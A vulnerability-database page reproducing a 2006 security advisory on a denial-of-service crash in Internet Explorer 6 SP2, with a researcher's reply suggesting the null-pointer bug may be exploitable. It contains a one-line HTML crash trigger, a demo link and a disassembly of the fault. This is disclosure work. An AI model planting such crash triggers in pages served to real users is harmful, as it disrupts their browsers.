DoS Vulnerability in MS IE 6 SP2

2007.02.26
Credit: morph3us
Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 are you sure dos only ? got a quick look on it , and if you are able to control this null pointer , the bug is exploitable, might be good more research on this bug. bugtraq (at) morph3us (dot) org [email concealed] wrote: > Hash: RIPEMD160 > > > --------------------------------------------------- > > | BuHa Security-Advisory #12 | May 25th, 2006 | > > --------------------------------------------------- > > | Vendor | MS Internet Explorer 6.0 | > > | URL | http://www.microsoft.com/windows/ie/ | > > | Version | <= 6.0.2900.2180.xpsp_sp2 | > > | Risk | Low (Denial of Service) | > > --------------------------------------------------- > > > o Description: > > ============= > > > Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser > > made by Microsoft and currently available as part of Microsoft Windows. > > > Visit http://www.microsoft.com/windows/ie/default.mspx or > > http://en.wikipedia.org/wiki/Internet_Explorer for detailed information. > > > o Denial of Service: <mshtml.dll>#7d6d2db4 > > =================== > > > Following HTML code forces MS IE 6 to crash: > > >> <applet><h4><title> </title><base> > > > Online-demo: > > http://morph3us.org/security/pen-testing/msie/ie60-1132901785453-7d6d2db 4.html > > > These are the register values and the ASM dump at the time of the access > > violation: > > >> eax=00000000 ebx=00000000 ecx=00e78d38 edx=00e7a704 esi=0012a268 > > >> edi=00000000 eip=7d6d2db4 esp=0012a228 ebp=0012a25c > > > >> 7d6d2d7d e868f9ffff call mshtml+0x2226ea (7d6d26ea) > > >> 7d6d2d82 50 push eax > > >> 7d6d2d83 e835f8ffff call mshtml+0x2225bd (7d6d25bd) > > >> 7d6d2d88 85c0 test eax,eax > > >> 7d6d2d8a 8945f8 mov [ebp-0x8],eax > > >> 7d6d2d8d 0f85c4020000 jne mshtml+0x223057 (7d6d3057) > > >> 7d6d2d93 8b461c mov eax,[esi+0x1c] > > >> 7d6d2d96 8b4e18 mov ecx,[esi+0x18] > > >> 7d6d2d99 8365f400 and dword ptr [ebp-0xc],0x0 > > >> 7d6d2d9d 8365fc00 and dword ptr [ebp-0x4],0x0 > > >> 7d6d2da1 8b7e14 mov edi,[esi+0x14] > > >> 7d6d2da4 8945f0 mov [ebp-0x10],eax > > >> 7d6d2da7 e88462e4ff call mshtml+0x69030 (7d519030) > > >> 7d6d2dac 3bc7 cmp eax,edi > > >> 7d6d2dae 0f8402020000 je mshtml+0x222fb6 (7d6d2fb6) > > >> FAULT ->7d6d2db4 8b07 mov eax,[edi] > > >> ds:0023:00000000=???????? > > >> 7d6d2db6 8bc8 mov ecx,eax > > >> 7d6d2db8 83e10f and ecx,0xf > > >> 7d6d2dbb 49 dec ecx > > >> 7d6d2dbc 0f849c010000 je mshtml+0x222f5e (7d6d2f5e) > > >> 7d6d2dc2 49 dec ecx > > >> 7d6d2dc3 0f84b3000000 je mshtml+0x222e7c (7d6d2e7c) > > >> 7d6d2dc9 49 dec ecx > > >> 7d6d2dca 49 dec ecx > > >> 7d6d2dcb 746c jz mshtml+0x222e39 (7d6d2e39) > > >> 7d6d2dcd 83e904 sub ecx,0x4 > > >> 7d6d2dd0 0f85a5010000 jne mshtml+0x222f7b (7d6d2f7b) > > >> 7d6d2dd6 8bcf mov ecx,edi > > >> 7d6d2dd8 e8482ffeff call mshtml+0x205d25 (7d6b5d25) > > >> 7d6d2ddd 85c0 test eax,eax > > >> 7d6d2ddf 7430 jz mshtml+0x222e11 (7d6d2e11) > > >> 7d6d2de1 837e0400 cmp dword ptr [esi+0x4],0x0 > > > This issue is a non-exploitable Null Pointer Dereference vulnerability and > > leads to DoS. > > > o Vulnerable versions: > > ===================== > > > The DoS vulnerability was successfully tested on: > > >> MS IE 6 SP2 - Win XP Pro SP2 > > >> MS IE 6 - Win 2k SP4 > > > o Disclosure Timeline: > > ===================== > > > xx Feb 06 - Vulnerabilities discovered. > > 08 Mar 06 - Vendor contacted. > > 22 Mar 06 - Vendor confirmed vulnerabilities. > > 25 May 06 - Public release. > > > o Solution: > > ========== > > > I think - this is not an official statement from the Microsoft Security > > Response Center - the vulnerability will be fixed in an upcoming service > > pack. > > > o Credits: > > ========= > > > Thomas Waldegger <bugtraq (at) morph3us (dot) org [email concealed]> > > BuHa-Security Community - http://buha.info/board/ > > > If you have questions, suggestions or criticism about the advisory feel > > free to send me a mail. The address 'bugtraq (at) morph3us (dot) org [email concealed]' is more a > > spam address than a regular mail address therefore it's possible that > > some mails get ignored. Please use the contact details at > > http://morph3us.org/ to contact me. > > > Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all > > members of BuHa. > > > Advisory online: http://morph3us.org/advisories/20060525-msie6-sp2-1.txt > > > -- > > Don't you feel the power of CSS Layouts? > > BuHa-Security Community: http://buha.info/board/ > > > > __________ NOD32 1.1560 (20060526) Information __________ > > This message was checked by NOD32 antivirus system. > http://www.eset.com > > > > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.1 (MingW32) iD8DBQFEdzM8FJS99fNfR+YRAsjuAKCBW98EprQ74gqSQbZyxE9pX3LJSgCfbnW3 xga88FMjNWjJ0eWSeiav4dM= =kk0I -----END PGP SIGNATURE----- begin:vcard fn:Arnaud Dovi / Ind. Security Researcher n:Dovi;Arnaud email;internet:ad (at) heapoverflow (dot) com [email concealed] tel;work:Independent Security Researcher version:2.1 end:vcard


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top